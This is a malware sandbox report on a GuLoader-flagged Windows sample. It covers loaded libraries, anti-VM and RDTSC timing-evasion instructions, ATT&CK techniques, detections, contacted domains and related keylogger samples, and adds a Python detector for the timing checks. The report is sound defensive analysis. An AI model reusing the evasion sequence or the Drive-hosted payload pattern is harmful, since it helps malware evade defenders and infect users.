    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: rasapi32.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: rasman.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: rtutils.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

    Data Obfuscation

Source: Yara match, File source: 00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_6EAB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, File created: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Process information set: NOOPENFILEERRORBOX (45 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX (51 identical entries)

    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\4AMVusDMPP.exe, API/Special instruction interceptor: Address: 3D7035B
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, API/Special instruction interceptor: Address: 20D035B
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, RDTSC instruction interceptor: First address: 3D332F0, second address: 3D332F0, instructions: 0x00000000 rdtsc 0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D8874DFE1h 0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, RDTSC instruction interceptor: First address: 20932F0, second address: 20932F0, instructions: 0x00000000 rdtsc 0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D893AACE1h 0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Memory allocated: 120000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Memory allocated: 335C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Memory allocated: 355C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_0040672B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_00402868 FindFirstFileW
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 3_2_00402868 FindFirstFileW
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 3_2_0040672B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: Amcache.hve.7.dr, Binary or memory string: VMware
Source: Amcache.hve.7.dr, Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr, Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr, Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr, Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr, Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr, Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr, Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr, Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr, Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr, Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr, Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr, Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr, Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr, Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr, Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr, Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.7.dr, Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr, Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr, Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr, Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr, Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr, Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr, Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr, Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr, Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr, Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr, Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr, Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, API call chain: ExitProcess graph end node, graph_0-4554
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, API call chain: ExitProcess graph end node, graph_0-4710
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_6EAB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Process token adjusted: Debug
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Process created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Queries volume information: C:\Users\user\Desktop\4AMVusDMPP.exe VolumeInformation
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\4AMVusDMPP.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr, Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr, Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr, Binary or memory string: MsMpEng.exe
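The two RDTSC interceptor entries above are the most sample-specific evidence in this section. Most of the other hits here and under Data Obfuscation come from the NSIS installer stub that wraps the sample (the SetErrorMode calls behind the NOOPENFILEERRORBOX entries, the FindFirstFileW/DeleteFileW helpers, the ExitWindowsEx reboot path inside the 0_2_004034A5 entry point, and the LoadLibraryW/GetProcAddress resolver in the dropped nsc34E8.tmp\System.dll plugin), and the VMware and MsMpEng.exe strings are read out of Amcache.hve.7.dr, the analysis VM's own Amcache collected as a WerFault artifact, so they reflect the VM's inventory rather than strings the sample carries. The script below is an added example, not Joe Sandbox code: it parses interceptor lines in the report's own format and flags the pattern of two rdtsc reads separated only by compare/increment filler plus a conditional branch, which is the timing-delta check the signature describes. The two input lines are copied from the report; the set of "filler" mnemonics is an assumption.

```python
import re
from dataclasses import dataclass, field

# The two "RDTSC instruction interceptor" lines copied from the report above.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\4AMVusDMPP.exe RDTSC instruction interceptor: "
    r"First address: 3D332F0 second address: 3D332F0 instructions: 0x00000000 rdtsc "
    r"0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D8874DFE1h "
    r"0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx "
    r"0x00000011 rdtsc",
    r"Source: C:\Users\user\Desktop\4AMVusDMPP.exe RDTSC instruction interceptor: "
    r"First address: 20932F0 second address: 20932F0 instructions: 0x00000000 rdtsc "
    r"0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D893AACE1h "
    r"0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx "
    r"0x00000011 rdtsc",
]

# Header of an interceptor line; the optional commas tolerate a lightly reformatted report.
HEADER_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+),? "
    r"second address: (?P<second>[0-9A-Fa-f]+),? instructions: (?P<body>.*)$"
)
# One instruction per "0x<8 hex offset> <text>"; text runs until the next offset token.
INSN_RE = re.compile(r"0x(?P<off>[0-9A-Fa-f]{8}) (?P<text>.*?)(?= 0x[0-9A-Fa-f]{8} |$)")

# Mnemonics that do not change the measured cycle delta (assumed list for this example).
FILLER = {"cmp", "inc", "dec", "test", "nop", "xchg"}


@dataclass
class Insn:
    offset: int
    mnemonic: str
    operands: str = ""


@dataclass
class RdtscTrace:
    first: int
    second: int
    insns: list = field(default_factory=list)


def parse_trace(line: str) -> RdtscTrace:
    """Turn one interceptor line into its two addresses plus a decoded instruction list."""
    m = HEADER_RE.search(line)
    if m is None:
        raise ValueError("not an RDTSC interceptor line")
    trace = RdtscTrace(int(m["first"], 16), int(m["second"], 16))
    for im in INSN_RE.finditer(m["body"]):
        parts = im["text"].strip().split(None, 1)
        operands = parts[1] if len(parts) > 1 else ""
        trace.insns.append(Insn(int(im["off"], 16), parts[0].lower(), operands))
    return trace


def classify(trace: RdtscTrace) -> dict:
    """Flag a timing check: two rdtsc reads, only filler between them, and a
    conditional branch that acts on the comparison."""
    rdtsc = [i.offset for i in trace.insns if i.mnemonic == "rdtsc"]
    branches = [i for i in trace.insns if i.mnemonic.startswith("j")]
    between = [i for i in trace.insns if rdtsc and rdtsc[0] < i.offset < rdtsc[-1]]
    only_filler = all(i.mnemonic in FILLER or i.mnemonic.startswith("j") for i in between)
    return {
        "rdtsc_count": len(rdtsc),
        "bytes_between_rdtsc": (rdtsc[-1] - rdtsc[0]) if len(rdtsc) >= 2 else None,
        # Same address recorded twice: the interceptor saw the check re-executed.
        "same_address": trace.first == trace.second,
        "conditional_branches": [f"{b.mnemonic} {b.operands}" for b in branches],
        "is_timing_loop": len(rdtsc) >= 2 and only_filler and bool(branches),
    }


def summarize(lines) -> list:
    """Parse every interceptor line in a list of report lines and skip the rest."""
    out = []
    for line in lines:
        if "RDTSC instruction interceptor" in line:
            t = parse_trace(line)
            out.append({"first": f"{t.first:X}", "second": f"{t.second:X}", **classify(t)})
    return out


if __name__ == "__main__":
    for entry in summarize(REPORT_LINES):
        print(entry)
```

Both report lines decode to the same nine-instruction sequence at two different base addresses (3D332F0 and 20932F0), 0x11 bytes between the rdtsc reads, which is consistent with one piece of shellcode mapped in two places; the report also shows the sample re-launching itself. A sandbox that single-steps or traps rdtsc inflates the delta between the two reads, and that is the condition the jc acts on.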
MITRE ATT&CK Matrix

Tactics (columns of the original matrix): Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Techniques flagged for this sample, by tactic (the leading number is the signature-count badge exactly as the report prints it; unflagged matrix cells are omitted):

Execution: 1 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Discovery: 211 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 214 System Information Discovery
Collection: 1 Archive Collected Data; 1 Clipboard Data
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol
Impact: 1 System Shutdown/Reboot

No technique was flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement or Exfiltration.

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
4AMVusDMPP.exe | 61% | ReversingLabs | Win32.Trojan.Guloader
4AMVusDMPP.exe | 100% | Avira | HEUR/AGEN.1337946
Antivirus detection, dropped file (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | 0% | ReversingLabs |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
drive.google.com | 142.250.181.238 | true | false | | high
drive.usercontent.google.com | 172.217.16.193 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://checkip.dyndns.org/ | false | | high
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
https://www.google.com | 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp; 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/~ | 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://checkip.dyndns.org | 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp; 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033634000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp; 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | 4AMVusDMPP.exe | false | | high
https://translate.google.com/translate_a/element.js | 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp; 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
142.250.181.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1588355
                                    Start date and time:2025-01-11 01:13:43 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:4AMVusDMPP.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@4/13@3/3
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 90%
                                    • Number of executed functions: 59
                                    • Number of non-executed functions: 71
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 4.175.87.197, 40.126.32.134, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 4AMVusDMPP.exe, PID 4216 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: 4AMVusDMPP.exe
Time | Type | Description
19:16:01 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Other samples sharing IP 193.122.130.0 (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
193.122.130.0 | tVuAoupHhZ.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | wymvwQ4mC4.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | VQsnGWaNi5.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | y1jQC8Y6bP.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | zAK7HHniGW.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | B3aqD8srjF.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | VIAmJUhQ54.exe | malicious | MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | tVuAoupHhZ.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | TjoY7n65om.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
checkip.dyndns.com | wymvwQ4mC4.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | H75MnQEha8.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | WGi85dsMNp.exe | malicious | GuLoader | 158.101.44.242
checkip.dyndns.com | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | 2NJzy3tiny.exe | malicious | MassLogger RAT | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | tVuAoupHhZ.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | phish_alert_sp2_2.0.0.0(4).eml | malicious | Unknown | 192.29.202.93
ORACLE-BMC-31898US | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 192.29.202.93
ORACLE-BMC-31898US | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 192.29.202.93
ORACLE-BMC-31898US | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | wymvwQ4mC4.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | WGi85dsMNp.exe | malicious | GuLoader | 158.101.44.242
ORACLE-BMC-31898US | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | 2NJzy3tiny.exe | malicious | MassLogger RAT | 193.122.6.168
